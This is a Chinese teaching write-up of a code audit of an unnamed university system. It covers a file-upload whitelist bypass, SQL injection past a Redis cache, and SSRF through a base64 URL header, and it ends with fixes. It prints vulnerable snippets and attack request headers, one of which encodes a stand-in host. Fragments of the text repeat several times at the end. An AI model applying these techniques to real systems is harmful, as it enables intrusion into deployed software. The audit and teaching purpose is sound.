某通用系统0day审计过程教学文档<\/h1>

1. 系统概述<\/h2>
本次审计目标是一套广泛应用于各大高校的通用系统，审计发现了多个安全漏洞，包括任意文件上传、SQL注入绕过Redis缓存以及SSRF漏洞。<\/p>

2. 路由分析<\/h2>

系统采用MVC架构，路由解析规则为：<\/p>

第一个接口对应Application<\/code>下的模块<\/li>
第二个接口对应模块下的Controller<\/code>文件名<\/li>

第三个接口为Controller中的方法名<\/li>
<\/ul>
示例：<\/p>
\/setting.php\/index\/login
<\/code><\/pre>
解析为：<\/p>

setting<\/code> → Application\/Setting\/<\/code><\/li>
index<\/code> → Controller\/IndexController.class.php<\/code><\/li>
login<\/code> → login<\/code>方法<\/li>
<\/ul>
3. 任意文件上传漏洞<\/h2>
漏洞位置<\/h3>
Application\Admin\Controller\UploadController.class.php<\/code><\/p>
漏洞分析<\/h3>

控制器继承了upload<\/code>父类，调用接口实例化UploadFile()<\/code>对象<\/li>
关键代码：<\/li>
<\/ol>
$upload-><\/span>exts<\/span> =<\/span> array<\/span>('jpg'<\/span>, 'gif'<\/span>, 'png'<\/span>, 'jpeg'<\/span>);
<\/span><\/span><\/code><\/pre>
问题核心：<\/li>
<\/ol>

调用UploadFile()<\/code>的__set<\/code>魔术方法：<\/li>
<\/ul>
public<\/span> function<\/span> __set($name, $value) {
<\/span><\/span>    if<\/span>(isset<\/span>($this-><\/span>config<\/span>[$name])) {
<\/span><\/span>        $this-><\/span>config<\/span>[$name] =<\/span> $value;
<\/span><\/span>    }
<\/span><\/span>}
<\/span><\/span><\/code><\/pre>
$config<\/code>数组中不存在exts<\/code>项，导致设置无效<\/li>
实际有效的配置项应为allowExts<\/code><\/li>
<\/ul>

文件类型检查函数：<\/li>
<\/ol>
private<\/span> function<\/span> checkExt<\/span>($ext) {
<\/span><\/span>    if<\/span>(!<\/span>empty<\/span>($this-><\/span>allowExts<\/span>))
<\/span><\/span>        return<\/span> in_array<\/span>(strtolower<\/span>($ext), $this-><\/span>allowExts<\/span>, true<\/span>);
<\/span><\/span>    return<\/span> true<\/span>;
<\/span><\/span>}
<\/span><\/span><\/code><\/pre>
由于allowExts<\/code>未被正确设置，导致白名单检查失效<\/li>
<\/ul>
漏洞利用<\/h3>
任何使用$upload->exts<\/code>设置上传类型的接口都存在任意文件上传风险，因为文件后缀检查实际上未生效。<\/p>
4. SQL注入(绕过Redis缓存)<\/h2>
漏洞位置<\/h3>
前台控制器中的某个路由<\/p>
漏洞分析<\/h3>

关键变量：<\/li>
<\/ol>

$count<\/code>：用于避免频繁查询<\/li>
$listJson<\/code>：从Redis获取的数据<\/li>
<\/ul>

绕过逻辑：<\/li>
<\/ol>
if<\/span>(!<\/span>$listJson) {
<\/span><\/span>    \/\/ 执行SQL查询
<\/span><\/span><\/span><\/span>}
<\/span><\/span><\/code><\/pre>
要使条件成立，需要确保：

Redis中查询不到指定的phone<\/code>值<\/li>
即使用不存在的手机号<\/li>
<\/ul>
<\/li>
<\/ul>

缓存机制：<\/li>
<\/ol>

查询后会将该手机号存入Redis<\/li>
因此需要每次使用不同的随机手机号来绕过缓存<\/li>
<\/ul>
漏洞利用<\/h3>
通过随机化phone<\/code>参数和伪造PHPSESSID<\/code>可以绕过Redis缓存机制，直接触发SQL查询，实现SQL注入。<\/p>
5. SSRF漏洞<\/h2>
漏洞位置<\/h3>
Application\Course\Controller\DocumentController.class.php<\/code><\/p>
漏洞分析<\/h3>

关键条件：<\/li>
<\/ol>
if<\/span>(!<\/span>$_SERVER['HTTP_AUTHORIZATION'<\/span>] ||<\/span> !<\/span>$_SERVER['HTTP_X_OSS_PUB_KEY_URL'<\/span>]) {
<\/span><\/span>    \/\/ 403跳转
<\/span><\/span><\/span><\/span>}
<\/span><\/span><\/code><\/pre>
需要同时设置这两个HTTP头才能绕过403跳转<\/li>
<\/ul>

漏洞代码：<\/li>
<\/ol>

对HTTP_X_OSS_PUB_KEY_URL<\/code>进行base64解码<\/li>
解码后的URL直接通过curl_exec<\/code>执行<\/li>
<\/ul>
漏洞利用<\/h3>
构造请求头：<\/p>
Authorization: Basic QWxhZGRpbjpPcGVuU2VzYW1l
X-Oss-Pub-Key-Url: [base64编码的恶意URL]
<\/code><\/pre>
例如：<\/p>
X-Oss-Pub-Key-Url: aHR0cDovL2V2aWwtdXJsLmNvbQ==
<\/code><\/pre>
解码后会请求http:\/\/evil-url.com<\/code><\/p>
6. 修复建议<\/h2>

文件上传漏洞：<\/li>
<\/ol>

修正配置项名称，使用allowExts<\/code>而非exts<\/code><\/li>
确保文件类型检查函数被正确调用<\/li>
添加默认白名单限制<\/li>
<\/ul>

SQL注入：<\/li>
<\/ol>

使用参数化查询<\/li>
对输入进行严格过滤和类型检查<\/li>
改进缓存机制，避免缓存绕过导致的安全问题<\/li>
<\/ul>

SSRF漏洞：<\/li>
<\/ol>

禁止从HTTP头中直接获取URL<\/li>
对允许的URL进行严格白名单限制<\/li>
禁用危险的协议如file:\/\/<\/code>、gopher:\/\/<\/code>等<\/li>
对base64解码后的内容进行严格验证<\/li>
<\/ul>
7. 审计方法论总结<\/h2>

路由分析是审计的起点，理解系统架构有助于快速定位功能点<\/li>
关注文件上传功能的实现细节，特别是：

文件类型检查机制<\/li>
魔术方法的潜在风险<\/li>
配置项的正确性<\/li>
<\/ul>
<\/li>
缓存机制可能引入安全风险，特别是当缓存绕过会导致原始漏洞暴露时<\/li>
全局搜索危险函数(如curl_exec<\/code>)是发现SSRF等漏洞的有效方法<\/li>
HTTP头注入是常见的攻击面，需要特别关注从头部获取参数的情况<\/li>
<\/ol>

某通用系统0day审计过程教学文档<\/h1>

1. 系统概述<\/h2>
本次审计目标是一套广泛应用于各大高校的通用系统，审计发现了多个安全漏洞，包括任意文件上传、SQL注入绕过Redis缓存以及SSRF漏洞。<\/p>

3. 任意文件上传漏洞<\/h2>

漏洞位置<\/h3>
`Application\Admin\Controller\UploadController.class.php<\/code><\/p>`

漏洞利用<\/h3>
任何使用`$upload->exts<\/code>设置上传类型的接口都存在任意文件上传风险，因为文件后缀检查实际上未生效。<\/p>`

漏洞位置<\/h3>
前台控制器中的某个路由<\/p>

漏洞利用<\/h3>
通过随机化`phone<\/code>参数和伪造PHPSESSID<\/code>可以绕过Redis缓存机制，直接触发SQL查询，实现SQL注入。<\/p>`

漏洞位置<\/h3>
`Application\Course\Controller\DocumentController.class.php<\/code><\/p>`

某通用系统0day审计过程教学文档<\/h1>

1. 系统概述<\/h2> 本次审计目标是一套广泛应用于各大高校的通用系统，审计发现了多个安全漏洞，包括任意文件上传、SQL注入绕过Redis缓存以及SSRF漏洞。<\/p>

3. 任意文件上传漏洞<\/h2>

漏洞位置<\/h3> Application\Admin\Controller\UploadController.class.php<\/code><\/p>

漏洞利用<\/h3> 任何使用$upload->exts<\/code>设置上传类型的接口都存在任意文件上传风险，因为文件后缀检查实际上未生效。<\/p>

漏洞位置<\/h3> 前台控制器中的某个路由<\/p>

漏洞利用<\/h3> 通过随机化phone<\/code>参数和伪造PHPSESSID<\/code>可以绕过Redis缓存机制，直接触发SQL查询，实现SQL注入。<\/p>

漏洞位置<\/h3> Application\Course\Controller\DocumentController.class.php<\/code><\/p>

1. 系统概述<\/h2>
本次审计目标是一套广泛应用于各大高校的通用系统，审计发现了多个安全漏洞，包括任意文件上传、SQL注入绕过Redis缓存以及SSRF漏洞。<\/p>

漏洞位置<\/h3>
`Application\Admin\Controller\UploadController.class.php<\/code><\/p>`

漏洞利用<\/h3>
任何使用`$upload->exts<\/code>设置上传类型的接口都存在任意文件上传风险，因为文件后缀检查实际上未生效。<\/p>`

漏洞位置<\/h3>
前台控制器中的某个路由<\/p>

漏洞利用<\/h3>
通过随机化`phone<\/code>参数和伪造PHPSESSID<\/code>可以绕过Redis缓存机制，直接触发SQL查询，实现SQL注入。<\/p>`

漏洞位置<\/h3>
`Application\Course\Controller\DocumentController.class.php<\/code><\/p>`